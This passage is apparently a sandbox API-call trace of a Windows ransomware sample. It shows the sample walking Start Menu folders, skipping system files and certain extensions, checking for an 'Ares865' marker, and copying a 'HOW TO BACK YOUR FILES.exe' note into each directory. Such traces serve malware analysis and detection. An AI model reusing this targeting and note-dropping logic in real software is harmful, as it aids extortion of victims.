ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0040.593] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0040.593] lstrcmpiW (lpString1="desktop.ini", lpString2="aoldtz.exe") returned 1 [0040.593] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0040.593] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0040.593] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0040.594] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0040.594] lstrcmpiW (lpString1="desktop.ini", lpString2="temp") returned -1 [0040.594] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0040.594] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0040.594] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0040.594] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0040.594] lstrcmpiW (lpString1="desktop.ini", lpString2="perflogs") returned -1 [0040.594] lstrcmpiW (lpString1="desktop.ini", lpString2="MSBuild") returned -1 [0040.594] lstrlenW (lpString="desktop.ini") returned 11 [0040.594] lstrlenW (lpString="C:\\Users\\Default User\\Start Menu\\Programs\\Administrative Tools\\*") returned 64 [0040.594] lstrcpyW (in: lpString1=0x2e2e8de, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0040.594] lstrlenW (lpString="desktop.ini") returned 11 [0040.594] lstrlenW (lpString="Ares865") returned 7 [0040.594] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0040.594] lstrlenW (lpString=".dll") returned 4 [0040.594] lstrcmpiW (lpString1="desktop.ini", lpString2=".dll") returned 1 [0040.594] lstrlenW (lpString=".lnk") returned 4 [0040.594] lstrcmpiW (lpString1="desktop.ini", lpString2=".lnk") returned 1 [0040.594] lstrlenW (lpString=".ini") returned 4 [0040.594] lstrcmpiW (lpString1="desktop.ini", lpString2=".ini") returned 1 [0040.594] lstrlenW (lpString=".sys") returned 4 [0040.594] lstrcmpiW (lpString1="desktop.ini", lpString2=".sys") returned 1 [0040.594] lstrlenW (lpString="desktop.ini") returned 11 [0040.594] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories") returned="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories" [0040.594] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cb938 | out: hHeap=0x2b0000) returned 1 [0040.594] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2480 | out: hHeap=0x2b0000) returned 1 [0040.594] lstrlenW (lpString="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories") returned 53 [0040.594] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories" | out: lpString1="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories") returned="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories" [0040.594] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0040.595] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\start menu\\programs\\accessories\\how to back your files.exe"), bFailIfExists=1) returned 1 [0040.611] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0040.611] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49d721a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49d721a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccfa8 [0040.611] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0040.611] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0040.611] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0040.611] FindNextFileW (in: hFindFile=0x2ccfa8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49d721a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49d721a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.611] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0040.612] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0040.612] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0040.612] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0040.612] FindNextFileW (in: hFindFile=0x2ccfa8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda4e0ba, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x63dece0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x1b75a077, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Accessibility", cAlternateFileName="ACCESS~1")) returned 1 [0040.612] lstrcmpiW (lpString1="Accessibility", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0040.612] lstrcmpiW (lpString1="Accessibility", lpString2="aoldtz.exe") returned -1 [0040.612] lstrcmpiW (lpString1="Accessibility", lpString2=".") returned 1 [0040.612] lstrcmpiW (lpString1="Accessibility", lpString2="..") returned 1 [0040.612] lstrcmpiW (lpString1="Accessibility", lpString2="windows") returned -1 [0040.612] lstrcmpiW (lpString1="Accessibility", lpString2="bootmgr") returned -1 [0040.612] lstrcmpiW (lpString1="Accessibility", lpString2="temp") returned -1 [0040.612] lstrcmpiW (lpString1="Accessibility", lpString2="pagefile.sys") returned -1 [0040.612] lstrcmpiW (lpString1="Accessibility", lpString2="boot") returned -1 [0040.612] lstrcmpiW (lpString1="Accessibility", lpString2="ids.txt") returned -1 [0040.612] lstrcmpiW (lpString1="Accessibility", lpString2="ntuser.dat") returned -1 [0040.612] lstrcmpiW (lpString1="Accessibility", lpString2="perflogs") returned -1 [0040.612] lstrcmpiW (lpString1="Accessibility", lpString2="MSBuild") returned -1 [0040.612] lstrlenW (lpString="Accessibility") returned 13 [0040.612] lstrlenW (lpString="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\*") returned 55 [0040.612] lstrcpyW (in: lpString1=0x2e2e8cc, lpString2="Accessibility" | out: lpString1="Accessibility") returned="Accessibility" [0040.612] SetFileAttributesW (lpFileName="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\Accessibility", dwFileAttributes=0x10) returned 1 [0040.687] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2480 [0040.687] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x88) returned 0x2e9eb0 [0040.687] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d2488 | out: ListHead=0x2e77d0, ListEntry=0x2d2488) returned 0x2d2468 [0040.687] FindNextFileW (in: hFindFile=0x2ccfa8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a53d8cd, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x63b8b80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2a53d8cd, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x500, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Command Prompt.lnk", cAlternateFileName="COMMAN~1.LNK")) returned 1 [0040.687] lstrcmpiW (lpString1="Command Prompt.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0040.687] lstrcmpiW (lpString1="Command Prompt.lnk", lpString2="aoldtz.exe") returned 1 [0040.688] lstrcmpiW (lpString1="Command Prompt.lnk", lpString2=".") returned 1 [0040.688] lstrcmpiW (lpString1="Command Prompt.lnk", lpString2="..") returned 1 [0040.688] lstrcmpiW (lpString1="Command Prompt.lnk", lpString2="windows") returned -1 [0040.688] lstrcmpiW (lpString1="Command Prompt.lnk", lpString2="bootmgr") returned 1 [0040.688] lstrcmpiW (lpString1="Command Prompt.lnk", lpString2="temp") returned -1 [0040.688] lstrcmpiW (lpString1="Command Prompt.lnk", lpString2="pagefile.sys") returned -1 [0040.688] lstrcmpiW (lpString1="Command Prompt.lnk", lpString2="boot") returned 1 [0040.688] lstrcmpiW (lpString1="Command Prompt.lnk", lpString2="ids.txt") returned -1 [0040.688] lstrcmpiW (lpString1="Command Prompt.lnk", lpString2="ntuser.dat") returned -1 [0040.688] lstrcmpiW (lpString1="Command Prompt.lnk", lpString2="perflogs") returned -1 [0040.688] lstrcmpiW (lpString1="Command Prompt.lnk", lpString2="MSBuild") returned -1 [0040.688] lstrlenW (lpString="Command Prompt.lnk") returned 18 [0040.688] lstrlenW (lpString="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\Accessibility") returned 67 [0040.688] lstrcpyW (in: lpString1=0x2e2e8cc, lpString2="Command Prompt.lnk" | out: lpString1="Command Prompt.lnk") returned="Command Prompt.lnk" [0040.688] lstrlenW (lpString="Command Prompt.lnk") returned 18 [0040.688] lstrlenW (lpString="Ares865") returned 7 [0040.688] lstrcmpiW (lpString1="mpt.lnk", lpString2="Ares865") returned 1 [0040.688] lstrlenW (lpString=".dll") returned 4 [0040.688] lstrcmpiW (lpString1="Command Prompt.lnk", lpString2=".dll") returned 1 [0040.688] lstrlenW (lpString=".lnk") returned 4 [0040.688] lstrcmpiW (lpString1="Command Prompt.lnk", lpString2=".lnk") returned 1 [0040.688] lstrlenW (lpString=".ini") returned 4 [0040.688] lstrcmpiW (lpString1="Command Prompt.lnk", lpString2=".ini") returned 1 [0040.688] lstrlenW (lpString=".sys") returned 4 [0040.688] lstrcmpiW (lpString1="Command Prompt.lnk", lpString2=".sys") returned 1 [0040.688] lstrlenW (lpString="Command Prompt.lnk") returned 18 [0040.688] lstrcpyW (in: lpString1=0x2e2e8cc, lpString2="Desktop.ini" | out: lpString1="Desktop.ini") returned="Desktop.ini" [0040.688] lstrlenW (lpString="Desktop.ini") returned 11 [0040.688] lstrlenW (lpString="Ares865") returned 7 [0040.688] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0040.689] lstrlenW (lpString=".dll") returned 4 [0040.689] lstrcmpiW (lpString1="Desktop.ini", lpString2=".dll") returned 1 [0040.689] lstrlenW (lpString=".lnk") returned 4 [0040.689] lstrcmpiW (lpString1="Desktop.ini", lpString2=".lnk") returned 1 [0040.689] lstrlenW (lpString=".ini") returned 4 [0040.689] lstrcmpiW (lpString1="Desktop.ini", lpString2=".ini") returned 1 [0040.689] lstrlenW (lpString=".sys") returned 4 [0040.689] lstrcmpiW (lpString1="Desktop.ini", lpString2=".sys") returned 1 [0040.689] lstrlenW (lpString="Desktop.ini") returned 11 [0040.689] lstrcpyW (in: lpString1=0x2e2e8cc, lpString2="Notepad.lnk" | out: lpString1="Notepad.lnk") returned="Notepad.lnk" [0040.689] lstrlenW (lpString="Notepad.lnk") returned 11 [0040.689] lstrlenW (lpString="Ares865") returned 7 [0040.689] lstrcmpiW (lpString1="pad.lnk", lpString2="Ares865") returned 1 [0040.689] lstrlenW (lpString=".dll") returned 4 [0040.689] lstrcmpiW (lpString1="Notepad.lnk", lpString2=".dll") returned 1 [0040.689] lstrlenW (lpString=".lnk") returned 4 [0040.689] lstrcmpiW (lpString1="Notepad.lnk", lpString2=".lnk") returned 1 [0040.689] lstrlenW (lpString=".ini") returned 4 [0040.689] lstrcmpiW (lpString1="Notepad.lnk", lpString2=".ini") returned 1 [0040.689] lstrlenW (lpString=".sys") returned 4 [0040.689] lstrcmpiW (lpString1="Notepad.lnk", lpString2=".sys") returned 1 [0040.689] lstrlenW (lpString="Notepad.lnk") returned 11 [0040.689] lstrcpyW (in: lpString1=0x2e2e8cc, lpString2="Run.lnk" | out: lpString1="Run.lnk") returned="Run.lnk" [0040.689] lstrlenW (lpString="Run.lnk") returned 7 [0040.689] lstrlenW (lpString="Ares865") returned 7 [0040.689] lstrlenW (lpString=".dll") returned 4 [0040.689] lstrcmpiW (lpString1="Run.lnk", lpString2=".dll") returned 1 [0040.689] lstrlenW (lpString=".lnk") returned 4 [0040.689] lstrcmpiW (lpString1="Run.lnk", lpString2=".lnk") returned 1 [0040.689] lstrlenW (lpString=".ini") returned 4 [0040.690] lstrcmpiW (lpString1="Run.lnk", lpString2=".ini") returned 1 [0040.690] lstrlenW (lpString=".sys") returned 4 [0040.690] lstrcmpiW (lpString1="Run.lnk", lpString2=".sys") returned 1 [0040.690] lstrlenW (lpString="Run.lnk") returned 7 [0040.690] lstrcpyW (in: lpString1=0x2e2e8cc, lpString2="System Tools" | out: lpString1="System Tools") returned="System Tools" [0040.690] SetFileAttributesW (lpFileName="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\System Tools", dwFileAttributes=0x10) returned 1 [0040.690] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d24c0 [0040.690] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x86) returned 0x2e9d90 [0040.690] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d24c8 | out: ListHead=0x2e77d0, ListEntry=0x2d24c8) returned 0x2d2488 [0040.690] FindNextFileW (in: hFindFile=0x2ccfa8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7dc80587, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0x6392a20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x7dfa026d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x4cc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Explorer.lnk", cAlternateFileName="WINDOW~1.LNK")) returned 1 [0040.690] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0040.690] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="aoldtz.exe") returned 1 [0040.690] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2=".") returned 1 [0040.690] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="..") returned 1 [0040.690] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="windows") returned 1 [0040.690] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="bootmgr") returned 1 [0040.690] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="temp") returned 1 [0040.690] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="pagefile.sys") returned 1 [0040.690] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="boot") returned 1 [0040.691] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="ids.txt") returned 1 [0040.691] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="ntuser.dat") returned 1 [0040.691] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="perflogs") returned 1 [0040.691] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="MSBuild") returned 1 [0040.691] lstrlenW (lpString="Windows Explorer.lnk") returned 20 [0040.691] lstrlenW (lpString="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\System Tools") returned 66 [0040.691] lstrcpyW (in: lpString1=0x2e2e8cc, lpString2="Windows Explorer.lnk" | out: lpString1="Windows Explorer.lnk") returned="Windows Explorer.lnk" [0040.691] lstrlenW (lpString="Windows Explorer.lnk") returned 20 [0040.691] lstrlenW (lpString="Ares865") returned 7 [0040.691] lstrcmpiW (lpString1="rer.lnk", lpString2="Ares865") returned 1 [0040.691] lstrlenW (lpString=".dll") returned 4 [0040.691] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2=".dll") returned 1 [0040.691] lstrlenW (lpString=".lnk") returned 4 [0040.691] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2=".lnk") returned 1 [0040.691] lstrlenW (lpString=".ini") returned 4 [0040.691] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2=".ini") returned 1 [0040.691] lstrlenW (lpString=".sys") returned 4 [0040.691] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2=".sys") returned 1 [0040.691] lstrlenW (lpString="Windows Explorer.lnk") returned 20 [0040.691] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\System Tools", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\System Tools") returned="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\System Tools" [0040.691] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9d90 | out: hHeap=0x2b0000) returned 1 [0040.691] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d24c0 | out: hHeap=0x2b0000) returned 1 [0040.691] lstrlenW (lpString="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\System Tools") returned 66 [0040.691] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\System Tools" | out: lpString1="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\System Tools") returned="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\System Tools" [0040.691] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0040.691] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\System Tools\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\start menu\\programs\\accessories\\system tools\\how to back your files.exe"), bFailIfExists=1) returned 1 [0040.736] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0040.736] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\System Tools\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfda4e0ba, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49d98300, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49d98300, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccfa8 [0040.736] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0040.736] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0040.736] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0040.736] FindNextFileW (in: hFindFile=0x2ccfa8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfda4e0ba, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49d98300, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49d98300, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.736] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0040.736] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0040.736] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0040.736] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0040.736] FindNextFileW (in: hFindFile=0x2ccfa8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ddd71ea, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0x6392a20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x7e0d0d6f, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x106, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="computer.lnk", cAlternateFileName="")) returned 1 [0040.736] lstrcmpiW (lpString1="computer.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0040.736] lstrcmpiW (lpString1="computer.lnk", lpString2="aoldtz.exe") returned 1 [0040.736] lstrcmpiW (lpString1="computer.lnk", lpString2=".") returned 1 [0040.736] lstrcmpiW (lpString1="computer.lnk", lpString2="..") returned 1 [0040.736] lstrcpyW (in: lpString1=0x2e2e8e6, lpString2="computer.lnk" | out: lpString1="computer.lnk") returned="computer.lnk" [0040.736] lstrlenW (lpString="computer.lnk") returned 12 [0040.736] lstrlenW (lpString="Ares865") returned 7 [0040.736] lstrcmpiW (lpString1="ter.lnk", lpString2="Ares865") returned 1 [0040.736] lstrlenW (lpString=".dll") returned 4 [0040.736] lstrcmpiW (lpString1="computer.lnk", lpString2=".dll") returned 1 [0040.736] lstrlenW (lpString=".lnk") returned 4 [0040.736] lstrcmpiW (lpString1="computer.lnk", lpString2=".lnk") returned 1 [0040.736] lstrlenW (lpString=".ini") returned 4 [0040.737] lstrcmpiW (lpString1="computer.lnk", lpString2=".ini") returned 1 [0040.737] lstrlenW (lpString=".sys") returned 4 [0040.737] lstrcmpiW (lpString1="computer.lnk", lpString2=".sys") returned 1 [0040.737] lstrlenW (lpString="computer.lnk") returned 12 [0040.737] lstrcpyW (in: lpString1=0x2e2e8e6, lpString2="Control Panel.lnk" | out: lpString1="Control Panel.lnk") returned="Control Panel.lnk" [0040.737] lstrlenW (lpString="Control Panel.lnk") returned 17 [0040.737] lstrlenW (lpString="Ares865") returned 7 [0040.737] lstrcmpiW (lpString1="nel.lnk", lpString2="Ares865") returned 1 [0040.737] lstrlenW (lpString=".dll") returned 4 [0040.737] lstrcmpiW (lpString1="Control Panel.lnk", lpString2=".dll") returned 1 [0040.737] lstrlenW (lpString=".lnk") returned 4 [0040.737] lstrcmpiW (lpString1="Control Panel.lnk", lpString2=".lnk") returned 1 [0040.737] lstrlenW (lpString=".ini") returned 4 [0040.737] lstrcmpiW (lpString1="Control Panel.lnk", lpString2=".ini") returned 1 [0040.737] lstrlenW (lpString=".sys") returned 4 [0040.737] lstrcmpiW (lpString1="Control Panel.lnk", lpString2=".sys") returned 1 [0040.737] lstrlenW (lpString="Control Panel.lnk") returned 17 [0040.737] lstrcpyW (in: lpString1=0x2e2e8e6, lpString2="Desktop.ini" | out: lpString1="Desktop.ini") returned="Desktop.ini" [0040.737] lstrlenW (lpString="Desktop.ini") returned 11 [0040.737] lstrlenW (lpString="Ares865") returned 7 [0040.737] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0040.737] lstrlenW (lpString=".dll") returned 4 [0040.737] lstrcmpiW (lpString1="Desktop.ini", lpString2=".dll") returned 1 [0040.737] lstrlenW (lpString=".lnk") returned 4 [0040.737] lstrcmpiW (lpString1="Desktop.ini", lpString2=".lnk") returned 1 [0040.737] lstrlenW (lpString=".ini") returned 4 [0040.737] lstrcmpiW (lpString1="Desktop.ini", lpString2=".ini") returned 1 [0040.737] lstrlenW (lpString=".sys") returned 4 [0040.737] lstrcmpiW (lpString1="Desktop.ini", lpString2=".sys") returned 1 [0040.737] lstrlenW (lpString="Desktop.ini") returned 11 [0040.738] lstrcpyW (in: lpString1=0x2e2e8e6, lpString2="Internet Explorer (No Add-ons).lnk" | out: lpString1="Internet Explorer (No Add-ons).lnk") returned="Internet Explorer (No Add-ons).lnk" [0040.738] lstrlenW (lpString="Internet Explorer (No Add-ons).lnk") returned 34 [0040.738] lstrlenW (lpString="Ares865") returned 7 [0040.738] lstrcmpiW (lpString1="ns).lnk", lpString2="Ares865") returned 1 [0040.738] lstrlenW (lpString=".dll") returned 4 [0040.738] lstrcmpiW (lpString1="Internet Explorer (No Add-ons).lnk", lpString2=".dll") returned 1 [0040.738] lstrlenW (lpString=".lnk") returned 4 [0040.738] lstrcmpiW (lpString1="Internet Explorer (No Add-ons).lnk", lpString2=".lnk") returned 1 [0040.738] lstrlenW (lpString=".ini") returned 4 [0040.738] lstrcmpiW (lpString1="Internet Explorer (No Add-ons).lnk", lpString2=".ini") returned 1 [0040.738] lstrlenW (lpString=".sys") returned 4 [0040.738] lstrcmpiW (lpString1="Internet Explorer (No Add-ons).lnk", lpString2=".sys") returned 1 [0040.738] lstrlenW (lpString="Internet Explorer (No Add-ons).lnk") returned 34 [0040.738] lstrcpyW (in: lpString1=0x2e2e8e6, lpString2="Private Character Editor.lnk" | out: lpString1="Private Character Editor.lnk") returned="Private Character Editor.lnk" [0040.738] lstrlenW (lpString="Private Character Editor.lnk") returned 28 [0040.738] lstrlenW (lpString="Ares865") returned 7 [0040.738] lstrcmpiW (lpString1="tor.lnk", lpString2="Ares865") returned 1 [0040.738] lstrlenW (lpString=".dll") returned 4 [0040.738] lstrcmpiW (lpString1="Private Character Editor.lnk", lpString2=".dll") returned 1 [0040.738] lstrlenW (lpString=".lnk") returned 4 [0040.738] lstrcmpiW (lpString1="Private Character Editor.lnk", lpString2=".lnk") returned 1 [0040.738] lstrlenW (lpString=".ini") returned 4 [0040.738] lstrcmpiW (lpString1="Private Character Editor.lnk", lpString2=".ini") returned 1 [0040.738] lstrlenW (lpString=".sys") returned 4 [0040.738] lstrcmpiW (lpString1="Private Character Editor.lnk", lpString2=".sys") returned 1 [0040.738] lstrlenW (lpString="Private Character Editor.lnk") returned 28 [0040.738] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\Accessibility", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\Accessibility") returned="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\Accessibility" [0040.738] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9eb0 | out: hHeap=0x2b0000) returned 1 [0040.738] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2480 | out: hHeap=0x2b0000) returned 1 [0040.738] lstrlenW (lpString="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\Accessibility") returned 67 [0040.739] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\Accessibility" | out: lpString1="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\Accessibility") returned="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\Accessibility" [0040.739] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0040.739] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\Accessibility\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\start menu\\programs\\accessories\\accessibility\\how to back your files.exe"), bFailIfExists=1) returned 1 [0040.752] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0040.752] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\Accessibility\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfda4e0ba, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49e30880, ftLastAccessTime.dwHighDateTime=0x1d56a3b, 